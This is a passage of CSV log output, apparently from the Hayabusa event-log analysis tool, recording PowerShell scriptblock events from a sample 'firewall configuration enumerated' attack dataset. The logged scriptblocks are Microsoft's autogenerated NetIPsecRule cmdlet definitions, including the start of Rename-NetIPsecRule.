[Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try 
{",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.770 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"__cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) 
$__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if 
($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if 
($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') 
-and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if 
($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 
'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue)",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.770 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"$__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not 
$__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.770 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Rename-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] 
[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] 
${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] 
[ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] 